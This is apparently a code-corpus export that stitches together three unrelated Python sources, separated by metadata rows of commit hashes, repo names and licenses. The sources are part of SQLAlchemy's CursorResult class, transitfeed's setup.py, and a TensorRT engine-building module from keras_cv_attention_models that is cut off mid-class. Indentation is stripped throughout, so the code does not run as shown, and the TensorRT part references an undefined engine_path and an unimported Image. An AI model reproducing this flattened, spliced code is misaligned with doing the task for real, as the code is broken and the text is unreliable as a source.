def _reduce(self, keys):
self._we_dont_return_rows()
@property
def _keymap(self):
self._we_dont_return_rows()
@property
def _key_to_index(self):
self._we_dont_return_rows()
@property
def _processors(self):
self._we_dont_return_rows()
@property
def keys(self):
self._we_dont_return_rows()
_NO_RESULT_METADATA = _NoResultMetaData()
def null_dml_result() -> IteratorResult[Any]:
it: IteratorResult[Any] = IteratorResult(_NoResultMetaData(), iter([]))
it._soft_close()
return it
class CursorResult(Result[_T]):
"""A Result that is representing state from a DBAPI cursor.
.. versionchanged:: 1.4 The :class:`.CursorResult``
class replaces the previous :class:`.ResultProxy` interface.
This classes are based on the :class:`.Result` calling API
which provides an updated usage model and calling facade for
SQLAlchemy Core and SQLAlchemy ORM.
Returns database rows via the :class:`.Row` class, which provides
additional API features and behaviors on top of the raw data returned by
the DBAPI. Through the use of filters such as the :meth:`.Result.scalars`
method, other kinds of objects may also be returned.
.. seealso::
:ref:`tutorial_selecting_data` - introductory material for accessing
:class:`_engine.CursorResult` and :class:`.Row` objects.
"""
__slots__ = (
"context",
"dialect",
"cursor",
"cursor_strategy",
"_echo",
"connection",
)
_metadata: Union[CursorResultMetaData, _NoResultMetaData]
_no_result_metadata = _NO_RESULT_METADATA
_soft_closed: bool = False
closed: bool = False
_is_cursor = True
context: DefaultExecutionContext
dialect: Dialect
cursor_strategy: ResultFetchStrategy
connection: Connection
def __init__(
self,
context: DefaultExecutionContext,
cursor_strategy: ResultFetchStrategy,
cursor_description: Optional[_DBAPICursorDescription],
):
self.context = context
self.dialect = context.dialect
self.cursor = context.cursor
self.cursor_strategy = cursor_strategy
self.connection = context.root_connection
self._echo = echo = (
self.connection._echo and context.engine._should_log_debug()
)
if cursor_description is not None:
# inline of Result._row_getter(), set up an initial row
# getter assuming no transformations will be called as this
# is the most common case
metadata = self._init_metadata(context, cursor_description)
_make_row = functools.partial(
Row,
metadata,
metadata._effective_processors,
metadata._key_to_index,
)
if context._num_sentinel_cols:
sentinel_filter = operator.itemgetter(
slice(-context._num_sentinel_cols)
)
def _sliced_row(raw_data):
return _make_row(sentinel_filter(raw_data))
sliced_row = _sliced_row
else:
sliced_row = _make_row
if echo:
log = self.context.connection._log_debug
def _log_row(row):
log("Row %r", sql_util._repr_row(row))
return row
self._row_logging_fn = _log_row
def _make_row_2(row):
return _log_row(sliced_row(row))
make_row = _make_row_2
else:
make_row = sliced_row
self._set_memoized_attribute("_row_getter", make_row)
else:
assert context._num_sentinel_cols == 0
self._metadata = self._no_result_metadata
def _init_metadata(self, context, cursor_description):
if context.compiled:
compiled = context.compiled
if compiled._cached_metadata:
metadata = compiled._cached_metadata
else:
metadata = CursorResultMetaData(self, cursor_description)
if metadata._safe_for_cache:
compiled._cached_metadata = metadata
# result rewrite/ adapt step. this is to suit the case
# when we are invoked against a cached Compiled object, we want
# to rewrite the ResultMetaData to reflect the Column objects
# that are in our current SQL statement object, not the one
# that is associated with the cached Compiled object.
# the Compiled object may also tell us to not
# actually do this step; this is to support the ORM where
# it is to produce a new Result object in any case, and will
# be using the cached Column objects against this database result
# so we don't want to rewrite them.
#
# Basically this step suits the use case where the end user
# is using Core SQL expressions and is accessing columns in the
# result row using row._mapping[table.c.column].
if (
not context.execution_options.get(
"_result_disable_adapt_to_context", False
)
and compiled._result_columns
and context.cache_hit is context.dialect.CACHE_HIT
and compiled.statement is not context.invoked_statement
):
metadata = metadata._adapt_to_context(context)
self._metadata = metadata
else:
self._metadata = metadata = CursorResultMetaData(
self, cursor_description
)
if self._echo:
context.connection._log_debug(
"Col %r", tuple(x[0] for x in cursor_description)
)
return metadata
def _soft_close(self, hard=False):
"""Soft close this :class:`_engine.CursorResult`.
This releases all DBAPI cursor resources, but leaves the
CursorResult "open" from a semantic perspective, meaning the
fetchXXX() methods will continue to return empty results.
This method is called automatically when:
* all result rows are exhausted using the fetchXXX() methods.
* cursor.description is None.
This method is **not public**, but is documented in order to clarify
the "autoclose" process used.
.. seealso::
:meth:`_engine.CursorResult.close`
"""
if (not hard and self._soft_closed) or (hard and self.closed):
return
if hard:
self.closed = True
self.cursor_strategy.hard_close(self, self.cursor)
else:
self.cursor_strategy.soft_close(self, self.cursor)
if not self._soft_closed:
cursor = self.cursor
self.cursor = None # type: ignore
self.connection._safe_close_cursor(cursor)
self._soft_closed = True
@property
def inserted_primary_key_rows(self):
"""Return the value of
:attr:`_engine.CursorResult.inserted_primary_key`
as a row contained within a list; some dialects may support a
multiple row form as well.
.. note:: As indicated below, in current SQLAlchemy versions this
accessor is only useful beyond what's already supplied by
:attr:`_engine.CursorResult.inserted_primary_key` when using the
:ref:`postgresql_psycopg2` dialect. Future versions hope to
generalize this feature to more dialects.
This accessor is added to support dialects that offer the feature
that is currently implemented by the :ref:`psycopg2_executemany_mode`
feature, currently **only the psycopg2 dialect**, which provides
for many rows to be INSERTed at once while still retaining the
behavior of being able to return server-generated primary key values.
* **When using the psycopg2 dialect, or other dialects that may support
"fast executemany" style inserts in upcoming releases** : When
invoking an INSERT statement while passing a list of rows as the
second argument to :meth:`_engine.Connection.execute`, this accessor
will then provide a list of rows, where each row contains the primary
key value for each row that was INSERTed.
* **When using all other dialects / backends that don't yet support
this feature**: This accessor is only useful for **single row INSERT
statements**, and returns the same information as that of the
:attr:`_engine.CursorResult.inserted_primary_key` within a
single-element list. When an INSERT statement is executed in
conjunction with a list of rows to be INSERTed, the list will contain
one row per row inserted in the statement, however it will contain
``None`` for any server-generated values.
Future releases of SQLAlchemy will further generalize the
"fast execution helper" feature of psycopg2 to suit other dialects,
thus allowing this accessor to be of more general use.
.. versionadded:: 1.4
.. seealso::
:attr:`_engine.CursorResult.inserted_primary_key`
"""
if not self.context.compiled:
raise exc.InvalidRequestError(
"Statement is not a compiled " "expression construct."
)
elif not self.context.isinsert:
raise exc.InvalidRequestError(
"Statement is not an insert() " "expression construct."
)
elif self.context._is_explicit_returning:
raise exc.InvalidRequestError(
"Can't call inserted_primary_key "
"when returning() "
"is used."
)
return self.context.inserted_primary_key_rows
@property
def inserted_primary_key(self):
"""Return the primary key for the row just inserted.
The return value is a :class:`_result.Row` object representing
a named tuple of primary key values in the order in which the
primary key columns are configured in the source
:class:`_schema.Table`.
.. versionchanged:: 1.4.8 - the
:attr:`_engine.CursorResult.inserted_primary_key`
value is now a named tuple via the :class:`_result.Row` class,
rather than a plain tuple.
This accessor only applies to single row :func:`_expression.insert`
constructs which did not explicitly specify
:meth:`_expression.Insert.returning`. Support for multirow inserts,
while not yet available for most backends, would be accessed using
the :attr:`_engine.CursorResult.inserted_primary_key_rows` accessor.
Note that primary key columns which specify a server_default clause, or
otherwise do not qualify as "autoincrement" columns (see the notes at
:class:`_schema.Column`), and were generated using the database-side
default, will appear in this list as ``None`` unless the backend
supports "returning" and the insert statement executed with the
"implicit returning" enabled.
Raises :class:`~sqlalchemy.exc.InvalidRequestError` if the executed
statement is not a compiled expression construct
or is not an insert() construct.
"""
if self.context.executemany:
raise exc.InvalidRequestError(
"This statement was an executemany call; if primary key "
"returning is supported, please "
"use .inserted_primary_key_rows."
)
ikp = self.inserted_primary_key_rows
if ikp:
return ikp[0]
else:
return None
def last_updated_params(self):
"""Return the collection of updated parameters from this
execution.
Raises :class:`~sqlalchemy.exc.InvalidRequestError` if the executed
statement is not a compiled expression construct
or is not an update() construct.
"""
if not self.context.compiled:
raise exc.InvalidRequestError(
"Statement is not a compiled " "expression construct."
)
elif not self.context.isupdate:
raise exc.InvalidRequestError(
"Statement is not an update() " "expression construct."
)
elif self.context.executemany:
return self.context.compiled_parameters
else:
return self.context.compiled_parameters[0]
def last_inserted_params(self):
"""Return the collection of inserted parameters from this
execution.
Raises :class:`~sqlalchemy.exc.InvalidRequestError` if the executed
statement is not a compiled expression construct
or is not an insert() construct.
"""
if not self.context.compiled:
raise exc.InvalidRequestError(
"Statement is not a compiled " "expression construct."
)
elif not self.context.isinsert:
raise exc.InvalidRequestError(
"Statement is not an insert() " "expression construct."
)
elif self.context.executemany:
return self.context.compiled_parameters
else:
return self.context.compiled_parameters[0]
@property
def returned_defaults_rows(self):
"""Return a list of rows each containing the values of default
columns that were fetched using
the :meth:`.ValuesBase.return_defaults` feature.
The return value is a list of :class:`.Row` objects.
.. versionadded:: 1.4
"""
return self.context.returned_default_rows
def splice_horizontally(self, other):
"""Return a new :class:`.CursorResult` that "horizontally splices"
together the rows of this :class:`.CursorResult` with that of another
:class:`.CursorResult`.
.. tip:: This method is for the benefit of the SQLAlchemy ORM and is
not intended for general use.
"horizontally splices" means that for each row in the first and second
result sets, a new row that concatenates the two rows together is
produced, which then becomes the new row. The incoming
:class:`.CursorResult` must have the identical number of rows. It is
typically expected that the two result sets come from the same sort
order as well, as the result rows are spliced together based on their
position in the result.
The expected use case here is so that multiple INSERT..RETURNING
statements (which definitely need to be sorted) against different
tables can produce a single result that looks like a JOIN of those two
tables.
E.g.::
r1 = connection.execute(
users.insert().returning(
users.c.user_name,
users.c.user_id,
sort_by_parameter_order=True
),
user_values
)
r2 = connection.execute(
addresses.insert().returning(
addresses.c.address_id,
addresses.c.address,
addresses.c.user_id,
sort_by_parameter_order=True
),
address_values
)
rows = r1.splice_horizontally(r2).all()
assert (
rows ==
[
("john", 1, 1, "foo@bar.com", 1),
("jack", 2, 2, "bar@bat.com", 2),
]
)
.. versionadded:: 2.0
.. seealso::
:meth:`.CursorResult.splice_vertically`
"""
clone = self._generate()
total_rows = [
tuple(r1) + tuple(r2)
for r1, r2 in zip(
list(self._raw_row_iterator()),
list(other._raw_row_iterator()),
)
]
clone._metadata = clone._metadata._splice_horizontally(other._metadata)
clone.cursor_strategy = FullyBufferedCursorFetchStrategy(
None,
initial_buffer=total_rows,
)
clone._reset_memoizations()
return clone
def splice_vertically(self, other):
"""Return a new :class:`.CursorResult` that "vertically splices",
i.e. "extends", the rows of this :class:`.CursorResult` with that of
another :class:`.CursorResult`.
.. tip:: This method is for the benefit of the SQLAlchemy ORM and is
not intended for general use.
"vertically splices" means the rows of the given result are appended to
the rows of this cursor result. The incoming :class:`.CursorResult`
must have rows that represent the identical list of columns in the
identical order as they are in this :class:`.CursorResult`.
.. versionadded:: 2.0
.. seealso::
:meth:`.CursorResult.splice_horizontally`
"""
clone = self._generate()
total_rows = list(self._raw_row_iterator()) + list(
other._raw_row_iterator()
)
clone.cursor_strategy = FullyBufferedCursorFetchStrategy(
None,
initial_buffer=total_rows,
)
clone._reset_memoizations()
return clone
def _rewind(self, rows):
"""rewind this result back to the given rowset.
this is used internally for the case where an :class:`.Insert`
construct combines the use of
:meth:`.Insert.return_defaults` along with the
"supplemental columns" feature.
"""
if self._echo:
self.context.connection._log_debug(
"CursorResult rewound %d row(s)", len(rows)
)
# the rows given are expected to be Row objects, so we
# have to clear out processors which have already run on these
# rows
self._metadata = cast(
CursorResultMetaData, self._metadata
)._remove_processors()
self.cursor_strategy = FullyBufferedCursorFetchStrategy(
None,
# TODO: if these are Row objects, can we save on not having to
# re-make new Row objects out of them a second time? is that
# what's actually happening right now? maybe look into this
initial_buffer=rows,
)
self._reset_memoizations()
return self
@property
def returned_defaults(self):
"""Return the values of default columns that were fetched using
the :meth:`.ValuesBase.return_defaults` feature.
The value is an instance of :class:`.Row`, or ``None``
if :meth:`.ValuesBase.return_defaults` was not used or if the
backend does not support RETURNING.
.. seealso::
:meth:`.ValuesBase.return_defaults`
"""
if self.context.executemany:
raise exc.InvalidRequestError(
"This statement was an executemany call; if return defaults "
"is supported, please use .returned_defaults_rows."
)
rows = self.context.returned_default_rows
if rows:
return rows[0]
else:
return None
def lastrow_has_defaults(self):
"""Return ``lastrow_has_defaults()`` from the underlying
:class:`.ExecutionContext`.
See :class:`.ExecutionContext` for details.
"""
return self.context.lastrow_has_defaults()
def postfetch_cols(self):
"""Return ``postfetch_cols()`` from the underlying
:class:`.ExecutionContext`.
See :class:`.ExecutionContext` for details.
Raises :class:`~sqlalchemy.exc.InvalidRequestError` if the executed
statement is not a compiled expression construct
or is not an insert() or update() construct.
"""
if not self.context.compiled:
raise exc.InvalidRequestError(
"Statement is not a compiled " "expression construct."
)
elif not self.context.isinsert and not self.context.isupdate:
raise exc.InvalidRequestError(
"Statement is not an insert() or update() "
"expression construct."
)
return self.context.postfetch_cols
def prefetch_cols(self):
"""Return ``prefetch_cols()`` from the underlying
:class:`.ExecutionContext`.
See :class:`.ExecutionContext` for details.
Raises :class:`~sqlalchemy.exc.InvalidRequestError` if the executed
statement is not a compiled expression construct
or is not an insert() or update() construct.
"""
if not self.context.compiled:
raise exc.InvalidRequestError(
"Statement is not a compiled " "expression construct."
)
elif not self.context.isinsert and not self.context.isupdate:
raise exc.InvalidRequestError(
"Statement is not an insert() or update() "
"expression construct."
)
return self.context.prefetch_cols
def supports_sane_rowcount(self):
"""Return ``supports_sane_rowcount`` from the dialect.
See :attr:`_engine.CursorResult.rowcount` for background.
"""
return self.dialect.supports_sane_rowcount
def supports_sane_multi_rowcount(self):
"""Return ``supports_sane_multi_rowcount`` from the dialect.
See :attr:`_engine.CursorResult.rowcount` for background.
"""
return self.dialect.supports_sane_multi_rowcount
@util.memoized_property
def rowcount(self) -> int:
"""Return the 'rowcount' for this result.
The 'rowcount' reports the number of rows *matched*
by the WHERE criterion of an UPDATE or DELETE statement.
.. note::
Notes regarding :attr:`_engine.CursorResult.rowcount`:
* This attribute returns the number of rows *matched*,
which is not necessarily the same as the number of rows
that were actually *modified* - an UPDATE statement, for example,
may have no net change on a given row if the SET values
given are the same as those present in the row already.
Such a row would be matched but not modified.
On backends that feature both styles, such as MySQL,
rowcount is configured by default to return the match
count in all cases.
* :attr:`_engine.CursorResult.rowcount`
is *only* useful in conjunction
with an UPDATE or DELETE statement. Contrary to what the Python
DBAPI says, it does *not* return the
number of rows available from the results of a SELECT statement
as DBAPIs cannot support this functionality when rows are
unbuffered.
* :attr:`_engine.CursorResult.rowcount`
may not be fully implemented by
all dialects. In particular, most DBAPIs do not support an
aggregate rowcount result from an executemany call.
The :meth:`_engine.CursorResult.supports_sane_rowcount` and
:meth:`_engine.CursorResult.supports_sane_multi_rowcount` methods
will report from the dialect if each usage is known to be
supported.
* Statements that use RETURNING may not return a correct
rowcount.
.. seealso::
:ref:`tutorial_update_delete_rowcount` - in the :ref:`unified_tutorial`
""" # noqa: E501
try:
return self.context.rowcount
except BaseException as e:
self.cursor_strategy.handle_exception(self, self.cursor, e)
raise # not called
@property
def lastrowid(self):
"""Return the 'lastrowid' accessor on the DBAPI cursor.
This is a DBAPI specific method and is only functional
for those backends which support it, for statements
where it is appropriate. It's behavior is not
consistent across backends.
Usage of this method is normally unnecessary when
using insert() expression constructs; the
:attr:`~CursorResult.inserted_primary_key` attribute provides a
tuple of primary key values for a newly inserted row,
regardless of database backend.
"""
try:
return self.context.get_lastrowid()
except BaseException as e:
self.cursor_strategy.handle_exception(self, self.cursor, e)
@property
def returns_rows(self):
"""True if this :class:`_engine.CursorResult` returns zero or more
rows.
I.e. if it is legal to call the methods
:meth:`_engine.CursorResult.fetchone`,
:meth:`_engine.CursorResult.fetchmany`
:meth:`_engine.CursorResult.fetchall`.
Overall, the value of :attr:`_engine.CursorResult.returns_rows` should
always be synonymous with whether or not the DBAPI cursor had a
``.description`` attribute, indicating the presence of result columns,
noting that a cursor that returns zero rows still has a
``.description`` if a row-returning statement was emitted.
This attribute should be True for all results that are against
SELECT statements, as well as for DML statements INSERT/UPDATE/DELETE
that use RETURNING. For INSERT/UPDATE/DELETE statements that were
not using RETURNING, the value will usually be False, however
there are some dialect-specific exceptions to this, such as when
using the MSSQL / pyodbc dialect a SELECT is emitted inline in
order to retrieve an inserted primary key value.
"""
return self._metadata.returns_rows
@property
def is_insert(self):
"""True if this :class:`_engine.CursorResult` is the result
of a executing an expression language compiled
:func:`_expression.insert` construct.
When True, this implies that the
:attr:`inserted_primary_key` attribute is accessible,
assuming the statement did not include
a user defined "returning" construct.
"""
return self.context.isinsert
def _fetchiter_impl(self):
fetchone = self.cursor_strategy.fetchone
while True:
row = fetchone(self, self.cursor)
if row is None:
break
yield row
def _fetchone_impl(self, hard_close=False):
return self.cursor_strategy.fetchone(self, self.cursor, hard_close)
def _fetchall_impl(self):
return self.cursor_strategy.fetchall(self, self.cursor)
def _fetchmany_impl(self, size=None):
return self.cursor_strategy.fetchmany(self, self.cursor, size)
def _raw_row_iterator(self):
return self._fetchiter_impl()
def merge(self, *others: Result[Any]) -> MergedResult[Any]:
merged_result = super().merge(*others)
setup_rowcounts = self.context._has_rowcount
if setup_rowcounts:
merged_result.rowcount = sum(
cast("CursorResult[Any]", result).rowcount
for result in (self,) + others
)
return merged_result
def close(self) -> Any:
"""Close this :class:`_engine.CursorResult`.
This closes out the underlying DBAPI cursor corresponding to the
statement execution, if one is still present. Note that the DBAPI
cursor is automatically released when the :class:`_engine.CursorResult`
exhausts all available rows. :meth:`_engine.CursorResult.close` is
generally an optional method except in the case when discarding a
:class:`_engine.CursorResult` that still has additional rows pending
for fetch.
After this method is called, it is no longer valid to call upon
the fetch methods, which will raise a :class:`.ResourceClosedError`
on subsequent use.
.. seealso::
:ref:`connections_toplevel`
"""
self._soft_close(hard=True)
@_generative
def yield_per(self, num: int) -> Self:
self._yield_per = num
self.cursor_strategy.yield_per(self, self.cursor, num)
return self
ResultProxy = CursorResult
|
1ed7e08b147b3b22517666e874d8d6dcf8ac4852
|
645aa520f2eff7e6001574e57c986aba129e4dd3
|
/setup.py
|
732936ba8dfb841c84e38ff19e4706ec92f065e5
|
[
"Apache-2.0"
] |
permissive
|
google/transitfeed
|
08c4ecfb6872b6c0dc409d9a35b32ef515e30253
|
104b5a5b339c62a94c1579d7209a41c7c0833e35
|
refs/heads/master
| 2023-09-05T03:08:17.640950
| 2022-05-23T16:23:53
| 2022-05-23T16:23:53
| 24,061,376
| 680
| 299
|
Apache-2.0
| 2022-09-28T09:02:50
| 2014-09-15T15:16:32
|
Python
|
UTF-8
|
Python
| false
| false
| 5,963
|
py
|
setup.py
|
#!/usr/bin/python2.5
# Copyright (C) 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This script can be used to create a source distribution, binary distribution
or Windows executable files. The output is put in dist/
See
https://github.com/google/transitfeed/wiki/BuildingPythonWindowsExecutables
for help on creating Windows executables.
"""
from distutils.core import setup
import glob
import os.path
from transitfeed import __version__ as VERSION
try:
import py2exe
has_py2exe = True
except ImportError as e:
# Won't be able to generate win32 exe
has_py2exe = False
# py2exe doesn't automatically include pytz dependency because it is optional
options = {'py2exe': {'packages': ['pytz', 'pybcp47']}}
scripts_for_py2exe = ['feedvalidator.py', 'schedule_viewer.py', 'kmlparser.py',
'kmlwriter.py', 'merge.py', 'unusual_trip_filter.py',
'location_editor.py', 'feedvalidator_googletransit.py',
'upgrade_translations.py', 'visualize_pathways.py']
# On Nov 23, 2009 Tom Brown said: I'm not confident that we can include a
# working copy of this script in the py2exe distribution because it depends on
# ogr. I do want it included in the source tar.gz.
scripts_for_source_only = ['shape_importer.py']
kwargs = {}
if has_py2exe:
kwargs['console'] = scripts_for_py2exe
# py2exe seems to ignore package_data and not add marey_graph. This makes it
# work.
kwargs['data_files'] = \
[('schedule_viewer_files',
glob.glob(os.path.join('gtfsscheduleviewer', 'files', '*')))]
options['py2exe'] = {'dist_dir': 'transitfeed-windows-binary-%s' % VERSION}
setup(
version=VERSION,
name='transitfeed',
url='https://github.com/google/transitfeed/',
download_url='https://github.com/google/transitfeed/archive/'
'%s.tar.gz' % VERSION,
maintainer='Multiple',
maintainer_email='transitfeed@googlegroups.com',
description='GTFS library and tools',
long_description='This module provides a library for reading, writing and '
'validating GTFS files. It includes some scripts that validate a feed, '
'display it using the Google Maps API and the start of a KML importer '
'and exporter.',
platforms='OS Independent',
license='Apache License, Version 2.0',
packages=['gtfsscheduleviewer', 'transitfeed'],
# Also need to list package_data contents in MANIFEST.in for it to be
# included in sdist. See "[Distutils] package_data not used by sdist
# command" Feb 2, 2007
package_data={'gtfsscheduleviewer': ['files/*']},
scripts=scripts_for_py2exe + scripts_for_source_only,
zip_safe=False,
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: Information Technology',
'Intended Audience :: Other Audience',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Scientific/Engineering :: GIS',
'Topic :: Software Development :: Libraries :: Python Modules'
],
options=options,
**kwargs
)
if has_py2exe:
# Some data files are not copied automatically by py2exe into the
# library.zip file. This concerns mainly files which are loaded by modules
# using pkg_resources.
import zipfile
# Open the library.zip file for appending additional files.
zipfile_path = os.path.join(options['py2exe']['dist_dir'], 'library.zip')
z = zipfile.ZipFile(zipfile_path, 'a')
# Sometime between pytz-2008a and pytz-2008i common_timezones started to
# include only names of zones with a corresponding data file in zoneinfo.
# pytz installs the zoneinfo directory tree in the same directory
# as the pytz/__init__.py file. These data files are loaded using
# pkg_resources.resource_stream. py2exe does not copy this to library.zip so
# resource_stream can't find the files and common_timezones is empty when
# read in the py2exe executable.
# This manually copies zoneinfo into the zip. See also
# https://github.com/google/transitfeed/issues/121
import pytz
# Make sure the layout of pytz hasn't changed
assert (pytz.__file__.endswith('__init__.pyc') or
pytz.__file__.endswith('__init__.py')), pytz.__file__
zoneinfo_dir = os.path.join(os.path.dirname(pytz.__file__), 'zoneinfo')
# '..\\Lib\\pytz\\__init__.py' -> '..\\Lib'
disk_basedir = os.path.dirname(os.path.dirname(pytz.__file__))
for absdir, directories, filenames in os.walk(zoneinfo_dir):
assert absdir.startswith(disk_basedir), (absdir, disk_basedir)
zip_dir = absdir[len(disk_basedir):]
for f in filenames:
z.write(os.path.join(absdir, f), os.path.join(zip_dir, f))
# The custom pybcp47 module included int the googletransit extension reads
# from a registry file in the resource path. This manually copies the file
# language-subtag-registry.txt to the library.zip file.
import extensions.googletransit.pybcp47 as pybcp47_module
pybcp47_dir = os.path.join(os.path.dirname(pybcp47_module.__file__))
disk_basedir = os.path.dirname(os.path.dirname(os.path.dirname(pybcp47_dir)))
zip_dir = pybcp47_dir[len(disk_basedir):]
z.write(os.path.join(pybcp47_dir, 'language-subtag-registry.txt'),
os.path.join(zip_dir, 'language-subtag-registry.txt'))
# Finally close the library.zip file.
z.close()
|
d9dac97d9ade3a89fc18d2b23124ebc8ecadf62f
|
68384147be31aadd870c0153ac75466b1f5de122
|
/keras_cv_attention_models/imagenet/tensorrt_engine.py
|
88a570cc7d5d09ed5cc031f1cc0b7805f1864629
|
[
"CC-BY-NC-4.0",
"CC-BY-4.0",
"MIT",
"LicenseRef-scancode-proprietary-license",
"Apache-2.0"
] |
permissive
|
leondgarse/keras_cv_attention_models
|
cbee0b641e4ed727d9646669cf1614ddf3435a8a
|
ac1d1146ef10823ce83bffdc527f227e9732ab55
|
refs/heads/main
| 2023-08-31T07:09:57.302178
| 2023-08-25T12:51:31
| 2023-08-25T12:51:31
| 391,777,965
| 460
| 69
|
MIT
| 2022-10-13T14:31:01
| 2021-08-02T00:59:55
|
Python
|
UTF-8
|
Python
| false
| false
| 11,367
|
py
|
tensorrt_engine.py
|
import os
import numpy as np
import tensorrt as trt
import pycuda.driver as cuda
try:
# Use autoprimaryctx if available (pycuda >= 2021.1) to prevent issues with other modules that rely on the primary device context.
import pycuda.autoprimaryctx
except ModuleNotFoundError:
import pycuda.autoinit
TRT_LOGGER = trt.Logger(trt.Logger.INFO)
def init_mean_std_by_rescale_mode(rescale_mode):
if isinstance(rescale_mode, (list, tuple)): # Specific mean and std
mean, std = rescale_mode
elif rescale_mode == "torch":
mean = np.array([0.485, 0.456, 0.406]).astype("float32") * 255.0
std = np.array([0.229, 0.224, 0.225]).astype("float32") * 255.0
elif rescale_mode == "tf": # [0, 255] -> [-1, 1]
mean, std = 127.5, 127.5
# mean, std = 127.5, 128.0
elif rescale_mode == "tf128": # [0, 255] -> [-1, 1]
mean, std = 128.0, 128.0
elif rescale_mode == "raw01":
mean, std = 0, 255.0 # [0, 255] -> [0, 1]
else:
mean, std = 0, 1 # raw inputs [0, 255]
return mean, std
class ImageCalibrator(trt.IInt8EntropyCalibrator2):
def __init__(self, data, cache_file, rescale_mode="torch"):
super().__init__()
self.data, self.cache_file, self.rescale_mode = data, cache_file, rescale_mode
self.built = False
def build(self, target_shape, batch_size, data_format="channels_last"):
# Every time get_batch is called, the next batch of size batch_size will be copied to the device and returned.
mean, std = init_mean_std_by_rescale_mode(self.rescale_mode)
target_shape = target_shape if isinstance(target_shape, (list, tuple)) else [target_shape, target_shape]
data = self.data
if isinstance(data, str):
from PIL import Image
print(">>>> Read input data from path:", data)
target_shape = list(target_shape)[::-1] # [width, height] for Image.resize
data = [np.array(Image.open(os.path.join(data, ii)).resize(target_shape)) for ii in os.listdir(data)]
else:
resize_shape = list(target_shape)[::-1] # [width, height] for Image.resize
target_shape = tuple(target_shape)
data = [ii if tuple(ii.shape[:2]) == target_shape else np.array(Image.fromarray(ii).resize(resize_shape)) for ii in data]
data = (np.array(data) - mean) / std
if data_format != "channels_last":
data = data.transpose([0, 3, 1, 2])
self.built_data, self.data_format = data, data_format
self.batch_size, self.target_shape = batch_size, target_shape
self.current_index = 0
self.device_input = cuda.mem_alloc(data[0].nbytes * self.batch_size) # Allocate enough memory for a whole batch.
self.built = True
print(">>>> Built data info: data.shape={}, data.min={:.4f}, data.max={:.4f}".format(data.shape, data.min(), data.max()))
def get_batch_size(self):
return self.batch_size
# TensorRT passes along the names of the engine bindings to the get_batch function.
# You don't necessarily have to use them, but they can be useful to understand the order of
# the inputs. The bindings list is expected to have the same ordering as 'names'.
def get_batch(self, names):
if self.current_index + self.batch_size > self.built_data.shape[0]:
return None
current_batch = int(self.current_index / self.batch_size)
if current_batch % 10 == 0:
print(">>>> Calibrating batch {:}, containing {:} images".format(current_batch, self.batch_size))
batch = self.built_data[self.current_index : self.current_index + self.batch_size].ravel()
cuda.memcpy_htod(self.device_input, batch)
self.current_index += self.batch_size
return [self.device_input]
def read_calibration_cache(self):
# If there is a cache, use it instead of calibrating again. Otherwise, implicitly return None.
if os.path.exists(self.cache_file):
with open(self.cache_file, "rb") as f:
return f.read()
def write_calibration_cache(self, cache):
with open(self.cache_file, "wb") as f:
f.write(cache)
def build_onnx_engine_one_input(model_file, engine_path=None, int8_calibrator=None, batch_size=-1, data_format="auto", max_workspace_size=-1):
# model_file, engine_path, int8_calibrator, batch_size, data_format, max_workspace_size = "aaa.onnx", None, None, -1, "auto", -1
EXPLICIT_BATCH = 1 << (int)(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH)
trt.init_libnvinfer_plugins(TRT_LOGGER, namespace="")
builder = trt.Builder(TRT_LOGGER)
config = builder.create_builder_config()
max_workspace_size = max_workspace_size if max_workspace_size > 0 else 8
# config.max_workspace_size = max_workspace_size * (2 ** 30) # 8 GB
config.set_memory_pool_limit(trt.MemoryPoolType.WORKSPACE, pool_size=max_workspace_size * (2**30))
network = builder.create_network(EXPLICIT_BATCH)
parser = trt.OnnxParser(network, TRT_LOGGER)
with open(model_file, "rb") as model:
parser.parse(model.read())
assert parser.num_errors == 0
inputs = network.get_input(0)
input_shape = inputs.shape
if batch_size > 0:
input_shape = [batch_size] + list(input_shape[1:])
network.get_input(0).shape = input_shape
else:
batch_size = inputs.shape[0]
# builder.max_batch_size = batch_size
print(">>>> Input name: {}, shape: {}, dtype: {}".format(inputs.name, input_shape, inputs.dtype))
outputs = [network.get_output(ii) for ii in range(network.num_outputs)]
for output in outputs:
print(">>>> Output name: {}, shape: {}, dtype: {}".format(output.name, output.shape, output.dtype))
if int8_calibrator is None:
config.set_flag(trt.BuilderFlag.FP16)
else:
config.set_flag(trt.BuilderFlag.INT8)
if data_format == "auto":
data_format = "channels_last" if input_shape[-1] < input_shape[1] else "channels_first"
data_input_shape = input_shape[1:-1] if data_format == "channels_last" else input_shape[2:]
print("data_format = {}, data_input_shape = {}".format(data_format, data_input_shape))
int8_calibrator.build(data_input_shape, batch_size, data_format=data_format)
config.int8_calibrator = int8_calibrator
# Dynamic batch_size
# profile = builder.create_optimization_profile()
# input_shape = network.get_input(0).shape[1:]
# profile.set_shape(network.get_input(0).name, (1, *input_shape), (1, *input_shape), (builder.max_batch_size, *input_shape))
# config.add_optimization_profile(profile)
# engine = builder.build_engine(network, config)
engine = builder.build_serialized_network(network, config)
if engine_path is None:
engine_path = "{}_{}.trt".format(os.path.splitext(model_file)[0], "float16" if int8_calibrator is None else "int8")
with open(engine_path, "wb") as ff:
print(">>>> Serializing engine to file: {:}".format(engine_path))
ff.write(engine)
return engine
class EngineInferenceOneInOneOut:
"""
>>> !pip install tensorrt pycuda
>>> import torch
>>> from keras_cv_attention_models.imagenet import tensorrt_engine
>>> aa = tensorrt_engine.ImageCalibrator('calibration_imagenet/', 'foo.cache')
>>> ee = tensorrt_engine.build_onnx_engine_one_input('aaa.onnx', int8_calibrator=aa)
>>> cc = tensorrt_engine.EngineInferenceOneInOneOut(ee, max_batch_size=4)
>>> print(cc(np.ones([1, 3, 224, 224])).shape)
>>> # (1, 1000)
>>> print(cc(np.ones([4, 3, 224, 224])).shape)
>>> # (4, 1000)
"""
def __init__(self, engine, max_batch_size=1):
if isinstance(engine, str):
with open(engine_path, "rb") as ff:
engine = ff.read()
with trt.Runtime(TRT_LOGGER) as runtime:
engine = runtime.deserialize_cuda_engine(engine)
assert runtime
input_binding, output_binding = None, None
